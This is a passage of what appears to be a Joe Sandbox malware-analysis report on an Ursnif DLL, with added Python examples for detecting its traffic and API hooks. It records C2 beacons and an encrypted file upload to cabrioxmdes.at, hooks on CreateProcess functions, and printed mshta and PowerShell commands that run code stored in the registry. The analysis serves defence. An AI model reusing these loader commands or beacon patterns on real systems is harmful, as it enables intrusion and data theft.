15 32 78 f5 39 db 07 45 f6 b7 f4 d8 76 44 f7 d9 70 ab 52 38 48 6d d9 74 d0 2b a1 02 00 72 9d 11 b6 31 88 95 31 42 48 0e 6a 29 df f0 9b 9a 66 a0 68 bc e2 0d b6 70 a0 15 a7 9b cc 07 b6 9c e4 e5 e5 21 8e 3c 9b 89 9b 15 63 98 47 50 c0 47 
eb 3d f9 48 20 db b4 1f 17 e2 6a 16 4a 1b 35 06 f4 1a cc 7a 68 f8 92 dd d7 a1 0b 72 9b 63 7d b3 a3 e5 04 d5 3a f1 15 8f e0 28 7f 17 89 c7 ad 50 62 02 dd 90 74 f4 7a 95 9c 54 cc e6 8f e6 3b 81 d1 eb 80 de 9b b8 d3 2f 23 e3 f4 5c 16 9c 16 32 bd d4 53 7b b8 53 37 2c 83 21 c6 91 69 06 67 e8 55 85 41 ec 02 90 9a be 15 0d 85 18 50 dc cf 14 a8 c7 e1 bf 67 da 8a 41 15 9d 84 1d 65 56 97 db 7e 39 d3 0e 82 a4 32 48 5f d9 30 ef 1b 7e e4 fa b9 c2 c6 b0 d9 7d f4 6f 1c 4d 31 6b a6 9a b9 5e be 6e 9b 66 8f a3 52 6d ce dd 26 f8 1d bf d1 d8 fe 25 26 12 38 1b 82 d0 20 3b b0 3a fc 78 fc c8 27 35 80 8c 3d 50 5e ac c0 9e 9d 60 4a d8 67 fd 0b 23 73 81 de e8 b6 92 23 2a 8b 3a 3e 6b c6 30 c7 50 f7 e0 9f 2d 41 bc 35 53 4a e5 0d 04 6e b3 3e 74 33 6d 8f 7e 23 d7 bf 78 78 ef ae 5a b9 bc 02 45 46 d8 8c 41 c3 a9 4e 7f 95 d2 4c d0 e0 2a 09 df b3 ad d9 52 c0 cb 92 bb 54 36 e8 82 b6 65 88 39 d7 a3 ec 7f 3a 70 bc 89 a3 24 54 c1 36 15 89 70 44 54 cc 9d 36 48 a4 0b 08 82 70 e1 8f 42 83 01 2c 8a 46 89 74 3b f0 2e 6c dd 01 ce 2d 06 bc 25 97 f6 98 1e d3 17 ab 54 a1 bc 7d b1 0b ce 72 55 e0 4b 60 12 34 c2 16 18 66 cb dc a6 fa 75 1c eb cf 35 22 58 8b 6f b0 53 f0 ac 29 7b 05 a8 36 39 ec ea 59 a1 d0 84 23 99 b9 d8 00 95 20 e1 45 61 c2 89 5d 33 c2 03 ce 59 4c a8 a0 7c b9 1a cb 8b b5 01 26 93 12 8e 7c 1e fb be 43 c8 53 8c
                                                        Data Ascii: ]p{3jR1?,.8tYTYZgMHDlW)06Xsp|>xWK9w^MWU4W@nM\H4g$PI9uz|>H@G~ yM6imMM?dx^!{Zqs\X;Pj,)HN8&Smh/0!p~5 &qCHgGOR"l}:*%V*uuq#9z|mfYBLA"ePiLYn"{DLQ]h]"KL2&v$|6v1Cb&=LO1EI~[6T'\=3cysXb./J}&=C<-.z6lO\y_YW&RtZ32x9EvDpR8Hmt+r11BHj)fhp!<cGPG=H jJ5zhrc}:(PbtzT;/#\2S{S7,!igUAPgAeV~92H_0~}oM1k^nfRm&%&8 ;:x'5=P^`Jg#s#*:>k0P-A5SJn>t3m~#xxZEFANL*RT6e9:p$T6pDT6HpB,Ft;.l-%T}rUK`4fu5"XoS){69Y# Ea]3YL|&|CS


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        2 | 192.168.2.4 | 49825 | 116.121.62.237 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        May 4, 2022 16:21:23.154438972 CEST | 12942 | OUT | GET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: cabrioxmdes.at
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:24.441509008 CEST | 12942 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:21:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Connection: close
                                                        Vary: Accept-Encoding


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        3 | 192.168.2.4 | 49836 | 116.121.62.237 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        May 4, 2022 16:21:35.078524113 CEST12968OUTPOST /images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=318247997342640097891112487322
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: cabrioxmdes.at
                                                        Content-Length: 563
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:36.648550987 CEST12983INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:21:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Connection: close
                                                        Vary: Accept-Encoding


                                                         Session ID: 4
                                                         Source IP: 192.168.2.4
                                                         Source Port: 49845
                                                         Destination IP: 116.121.62.237
                                                         Destination Port: 80
                                                         Process: C:\Windows\explorer.exe

                                                         Timestamp: May 4, 2022 16:21:37.325897932 CEST
                                                         kBytes transferred: 12991
                                                         Direction: OUT
                                                         Data:
                                                         POST /images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp HTTP/1.1
                                                         Content-Type: multipart/form-data; boundary=315998012542640097891134987170
                                                         User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                         Host: cabrioxmdes.at
                                                         Content-Length: 387
                                                         Connection: Keep-Alive
                                                         Cache-Control: no-cache
                                                         Data Raw: 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 34 43 32 2e 62 69 6e 22 0d 0a 0d 0a c4 3a 05 dc 08 18 e8 11 ed cf a4 0c ab c1 02 66 7d 8c 42 f8 e1 54 84 bf 45 eb 69 35 db 71 df 5a 7f 36 2e 39 a9 d4 bc 44 3f a5 2d 4f e4 77 6d 4d e9 fd cb 9f 34 d3 52 90 c7 ef 96 8b 3a 51 52 33 1e 4e d7 58 12 20 f0 a1 ba 72 e2 a4 65 f4 9c 4a ba eb 0d a4 54 4a 8d a0 e6 5c df 1a 39 1e 99 48 4e bf 06 66 06 d2 5a c9 d5 25 ba ab df 3a 46 79 a9 9f 83 41 05 5b 19 68 e6 69 3c fa 64 22 5f d7 f5 51 fa 1a 19 70 83 6d 10 60 e4 02 29 a5 fe f7 70 0e ed 73 f8 c2 02 d4 cc d9 86 fb 43 90 cd b5 d4 4d 65 6e f2 f6 86 52 19 54 55 bf bc d5 03 6f 02 d5 2c db 53 12 f0 55 f2 6b bf 87 b2 cc aa 53 11 20 16 69 ac 25 cc fe 66 c8 96 93 c4 85 7f df 36 8f ff e7 40 65 fe 99 ce cc 93 52 c1 0b 35 49 c7 bb e4 4a 3a 27 ce 10 6b ec c7 39 84 5a 65 f9 0d 0a 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 2d 2d 0d 0a
                                                         Data Ascii (non-printable bytes dropped): --315998012542640097891134987170Content-Disposition: form-data; name="upload_file"; filename="84C2.bin":f}BTEi5qZ6.9D?-OwmM4R:QR3NX reJTJ\9HNfZ%:FyA[hi<d"_Qpm`)psCMenRTUo,SUkS i%f6@eR5IJ:'k9Ze--315998012542640097891134987170--

                                                         Timestamp: May 4, 2022 16:21:38.620135069 CEST
                                                         kBytes transferred: 12997
                                                         Direction: IN
                                                         Data:
                                                         HTTP/1.1 200 OK
                                                         Server: nginx/1.18.0 (Ubuntu)
                                                         Date: Wed, 04 May 2022 14:21:38 GMT
                                                         Content-Type: text/html; charset=UTF-8
                                                         Connection: close
                                                         Vary: Accept-Encoding
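
The three sessions above are the injected explorer.exe's first check-ins with cabrioxmdes.at. As an added example, not part of the Joe Sandbox report, the following Python scores a raw HTTP request for the traits visible in them: a very deep path of random-looking segments containing `_2B`/`_2F` (the hex codes of `+` and `/`, i.e. a base64 alphabet pushed through a custom escaping) that ends in an image extension, a User-Agent claiming IE 8 on Windows NT 10.0 (a combination that never shipped), and a multipart POST whose only part is `upload_file` with a `.bin` filename. The sample requests are reassembled from the sessions above (the POST body's encrypted bytes are omitted); the segment-count and length thresholds are assumptions chosen for this example.

```python
import re
from urllib.parse import urlsplit

IMAGE_EXT = (".gif", ".bmp", ".jpeg", ".jpg", ".png", ".avi")

# Constructed sample: two request heads reassembled from the sandbox sessions
# above (the POST body's encrypted bytes are omitted) plus one benign request.
BEACON_GET = (
    "GET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/"
    "55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/"
    "1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/"
    "XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/"
    "z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)\r\n"
    "Host: cabrioxmdes.at\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
)
BEACON_POST = (
    "POST /images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/"
    "_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/"
    "oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/"
    "nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/"
    "wtoW_2F78Wali9Dqxz_/2F8R.bmp HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=315998012542640097891134987170\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)\r\n"
    "Host: cabrioxmdes.at\r\nContent-Length: 387\r\nConnection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n"
    "--315998012542640097891134987170\r\n"
    'Content-Disposition: form-data; name="upload_file"; filename="84C2.bin"\r\n\r\n'
    "<encrypted bytes omitted>\r\n--315998012542640097891134987170--\r\n"
)
BENIGN_GET = (
    "GET /images/logo.gif HTTP/1.1\r\nHost: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/100.0\r\n\r\n"
)


def parse_request(raw):
    """Split one HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def indicators(raw):
    """Names of the Ursnif/ISFB-style traits present in one request."""
    method, path, headers, body = parse_request(raw)
    p = urlsplit(path).path
    segments = [s for s in p.split("/") if s]
    found = []
    # 1. Deep, long path of random segments ending in an image extension and
    #    carrying "_2B"/"_2F" (hex for '+' and '/'): an escaped base64 blob.
    #    Thresholds (8 segments, 200 chars) are assumptions for this example.
    if (len(segments) >= 8 and len(p) > 200 and p.lower().endswith(IMAGE_EXT)
            and ("_2B" in p or "_2F" in p)):
        found.append("encoded-path")
    # 2. IE 8 never shipped for Windows 10, so this UA string is fabricated.
    ua = headers.get("user-agent", "")
    if "MSIE 8.0" in ua and "Windows NT 10.0" in ua:
        found.append("impossible-ua")
    # 3. Multipart upload to an "image" URL whose part is upload_file=<hex>.bin.
    if (method == "POST"
            and "multipart/form-data" in headers.get("content-type", "")
            and re.search(r'name="upload_file"; filename="[0-9A-F]+\.bin"', body)):
        found.append("bin-upload")
    return found


def is_ursnif_like(raw):
    """Two independent traits are required before a request is flagged."""
    return len(indicators(raw)) >= 2
```

The fields used (method, URI, User-Agent, Content-Type) are exactly what a proxy log or Zeek `http.log` carries, so the predicate ports directly to those sources. Where response headers are logged, note that the server answered every `.gif`/`.bmp` request above with `Content-Type: text/html`, a further mismatch worth keying on.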


                                                         Code Manipulations

                                                         Hooks installed in user-mode modules (Function Name | Hook Type | Active in Processes):
                                                         CreateProcessAsUserW | EAT | explorer.exe
                                                         CreateProcessAsUserW | INLINE | explorer.exe
                                                         CreateProcessW | EAT | explorer.exe
                                                         CreateProcessW | INLINE | explorer.exe
                                                         CreateProcessA | EAT | explorer.exe
                                                         CreateProcessA | INLINE | explorer.exe
                                                         api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | explorer.exe
                                                         api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | explorer.exe

                                                         EAT and inline hooks (Function Name | Hook Type | New Data; for EAT the replacement export address, for INLINE the bytes written over the function prologue):
                                                         CreateProcessAsUserW | EAT | 7FF80250521C
                                                         CreateProcessAsUserW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                         CreateProcessW | EAT | 7FF802505200
                                                         CreateProcessW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                         CreateProcessA | EAT | 7FF80250520E
                                                         CreateProcessA | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00

                                                         IAT hooks (Function Name | Hook Type | New Data; the replacement pointer in the import slot):
                                                         api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FF802505200
                                                         api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 7E3B6B0
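
The table shows three hook styles in one process: the export entries for the CreateProcess* family were re-pointed (EAT), explorer.exe's import slots for CreateProcessW and RegGetValueW were overwritten (IAT), and the functions' first bytes were patched (INLINE). The EAT value for CreateProcessW and the IAT value are the same address, 7FF802505200, so both redirections land on one trampoline. As an added example, not from the report or Joe Security, the following Python shows the three checks a hook scanner makes, run over the addresses in the table: the module ranges, the exporting module names and the clean prologue bytes are constructed assumptions (only explorer.exe's image base is taken from the report).

```python
import struct

# Constructed module map: explorer.exe's image base is the one in the report,
# every other range (and explorer's size) is an assumption for this example.
MODULES = {
    "explorer.exe": (0x7FF6F3B00000, 0x7FF6F3F00000),
    "kernel32.dll": (0x7FF802300000, 0x7FF802400000),
    "advapi32.dll": (0x7FF801900000, 0x7FF801A00000),
}

# Values from the report's Code Manipulations table (explorer.exe). The report
# names the functions but not the exporting module; kernel32.dll is assumed.
REPORT_EXPORTS = [
    ("kernel32.dll", "CreateProcessAsUserW", 0x7FF80250521C),
    ("kernel32.dll", "CreateProcessW", 0x7FF802505200),
    ("kernel32.dll", "CreateProcessA", 0x7FF80250520E),
]
REPORT_IMPORTS = [
    ("explorer.exe", "api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW", 0x7FF802505200),
    ("explorer.exe", "api-ms-win-core-registry-l1-1-0.dll:RegGetValueW", 0x7E3B6B0),
]
REPORT_INLINE = bytes([0xFF, 0xF2, 0x25, 0x50, 0x00, 0x00])
CLEAN_PROLOGUE = b"\x4C\x8B\xDC"   # assumed on-disk bytes, not from the report


def module_for(addr):
    """Name of the mapped image containing addr, or None for private memory."""
    for name, (lo, hi) in MODULES.items():
        if lo <= addr < hi:
            return name
    return None


def eat_hooks(exports):
    """exports: (module, function, address read from that module's export table).
    A genuine export resolves inside its own image; anything else is an EAT hook."""
    return [(m, f, hex(a)) for m, f, a in exports if module_for(a) != m]


def iat_hooks(imports):
    """imports: (importer, imported name, value found in the IAT slot).
    A clean slot points into some loaded image; a slot pointing at unbacked
    memory was patched after the loader resolved it."""
    return [(i, n, hex(a)) for i, n, a in imports if module_for(a) is None]


def classify_prologue(addr, current, clean):
    """Compare the live first bytes of a function at addr with the on-disk copy;
    when they differ, name the redirection stub if it is a common one and
    return the address it transfers control to (or the slot it reads)."""
    if current[:len(clean)] == clean:
        return ("clean", None)
    if current[0] == 0xE9 and len(current) >= 5:                 # jmp rel32
        rel = struct.unpack_from("<i", current, 1)[0]
        return ("inline-jmp-rel32", addr + 5 + rel)
    if current[:2] == b"\xFF\x25" and len(current) >= 6:         # jmp [rip+disp32]
        disp = struct.unpack_from("<i", current, 2)[0]
        return ("inline-jmp-indirect", addr + 6 + disp)
    if current[:2] == b"\x48\xB8" and current[10:12] == b"\xFF\xE0":  # mov rax,imm64; jmp rax
        return ("inline-mov-jmp", struct.unpack_from("<Q", current, 2)[0])
    return ("inline-modified", None)
```

On a live host the same logic runs over the module list plus the on-disk copy of each DLL. Exclude forwarded exports before applying the EAT rule (a forwarder's RVA points at a string inside the export directory, not at code), or every forwarder will look like a hook; and treat the inline bytes from the report as "modified, stub not recognised" rather than decoding them as one of the common patterns, which they do not match.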


                                                        Target ID:0
                                                        Start time:16:18:46
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\loaddll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll"
                                                        Imagebase:0x110000
                                                        File size:116736 bytes
                                                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:1
                                                        Start time:16:18:46
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                                                        Imagebase:0x1190000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:2
                                                        Start time:16:18:46
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                                                        Imagebase:0x11a0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Target ID:19
                                                        Start time:16:19:23
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                                        Imagebase:0x7ff70ad70000
                                                        File size:14848 bytes
                                                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:20
                                                        Start time:16:19:26
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                                        Imagebase:0x7ff6ba650000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Target ID:21
                                                        Start time:16:19:26
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:22
                                                        Start time:16:19:38
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                                                        Imagebase:0x7ff7cb6d0000
                                                        File size:2739304 bytes
                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:moderate

                                                        Target ID:23
                                                        Start time:16:19:41
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"
                                                        Imagebase:0x7ff7bf6d0000
                                                        File size:47280 bytes
                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Target ID:24
                                                        Start time:16:19:44
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\control.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\control.exe -h
                                                        Imagebase:0x7ff6a5e80000
                                                        File size:117760 bytes
                                                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        Target ID:25
                                                        Start time:16:19:45
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
